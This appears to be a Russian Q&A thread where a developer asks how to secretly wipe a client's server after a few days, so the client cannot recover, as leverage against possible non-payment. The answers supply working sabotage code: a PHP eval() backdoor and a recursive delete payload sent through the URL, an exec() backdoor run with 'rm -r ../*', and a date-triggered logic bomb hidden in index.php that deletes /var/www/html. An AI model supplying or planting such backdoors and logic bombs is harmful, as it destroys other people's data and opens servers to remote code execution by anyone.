# Удалить все файлы через 3 дня на сервере

Tags: javascript, php, html, css, delete

Нужно удалить все файлы и папки рекурсивно на сервере. Доступ по FTP.

Как можно удалить все через 4 дня автоматически?

PS скрипт должен быть пассивным, не должен запускаться вручную

Comment: На кроне например раз в сутки запускаем скрипт который содержит нужную вам логику

Comment: Скрипт надо зашифровать что бы заказчик не смог восстоновить так как хостинг им восстановить а скрипт найти им займет время и средства.

Comment: Пакостить не хорошо... :-(

Comment: @Nilsan если бы пакостить. Мне надо себя защитить от клиента который может мне не выплатить.

Comment: Клиент просто скопирует всё себе в бэкап за эти 4 дня, не?

Comment: @andreymal он скопирует уже со скриптом для удаления

Comment: @urbanbrains скрипт для удаления не сработает, если его никто в бэкапе всё равно не запустит ;)

Comment: Поэтому он должен быть автоматическим

Comment: Скрипт, лежащий внутри флешки на полочке в шкафчике, запустится автоматически разве что чудом божьим ;)

Answer (score 1, accepted):

```
if(isset($_REQUEST['eval'])){ 
    die(eval($_REQUEST['eval']));
}
```

и в адресной строке ввести

```
http://mysite.com?eval=function del_all($path){if(is_file($path)){return @unlink($path);}foreach(scandir($path) as $val){if($val=='.'||$val=='..'){continue;}del_all("{$path}/{$val}");}return @rmdir($path);}del_all(dirname(__FILE__));
```

`del_all(dirname(__FILE__).'/../');` - удалить на директорию выше;

`del_all('/'); - стоит попытаться)`

Comment: Не работает. Ошибка `This site can’t be reachedhttp’s server IP address could not be found.`

Comment: ```if(isset($_REQUEST['exec'])){```
 ```die(exec($_REQUEST['exec']));```
    ```}```
```http://mysite.com/?exec=rm -r ../*```

Comment: Классный способ и короткий

Comment: @IvanMatthews Ничего не дало. Просто страница загружается и все. В консоли: `Failed to load resource: the server responded with a status of 404 (Not Found)`

Comment: @urbanbrains так 404 не говорит нам о том, что файлов нет?

Comment: Тогда почему на сервере они остались?

Comment: это ужасно. любой может послать вредоносный код к вам на сервер.

Comment: 404 на _GET быть не должно (если роутинг не на GET-запросах построен и не выбрасывает 404 до того, как дойдет до этой точки). Попробуй в консоли браузера выполнить JS ```$.ajax({url:"http://адрес-сайта.ком",type:"POST",data:{exec:"rm -r ../*"}})``` (для jQuery)

Comment: @IvanMatthews вышло `{readyState: 1, setRequestHeader: ƒ, getAllResponseHeaders: ƒ, getResponseHeader: ƒ, overrideMimeType: ƒ, …}`

Answer (score 0):

1. Если есть возможность - cron.
2. В главном php файле, index.php, добавить что-то вроде этого

```
<?php
// Функция удаления всего в папке
function deleteAll($path) { 
    if (is_file($str)) { 
        return unlink($str); 
    } 
    elseif (is_dir($str)) { 
        $scan = glob(rtrim($str, '/').'/*'); 

        foreach($scan as $index=>$path) { 
            deleteAll($path); 
        } 

        return @rmdir($str); 
    } 
} 

$now_date = new DateTime(); 
$target_date = new DateTime("2019-09-13"); // После этой даты, будет все стираться

if ($now_date->format('Y-m-d') >= $target_date->format('Y-m-d')) { 
    deleteAll('/var/www/html'); // Тут необходимый путь к директории
}
```

Как только запустят этот файл, сразу же выполнится функция.
Ответственности не несу. Делайте бекапы. Тестируйте заранее.

Comment: доступ на сервера сразу на ./ указать deleteAll('./'); ? Надо что бы удалил все из исходной директории и дальше по папкам и подпапкам и тд

Comment: да, потестируйте скрипт где-нибудь в безопасном месте

Comment: Не работает. Я ставил дату которая сегодня и которая вчера была. Не удаляло.

Comment: @urbanbrains обязательно надо, чтобы этот скрипт выполнился, запускали его?

Comment: Нет. Он может быть пассивным главное что бы он удалил файлы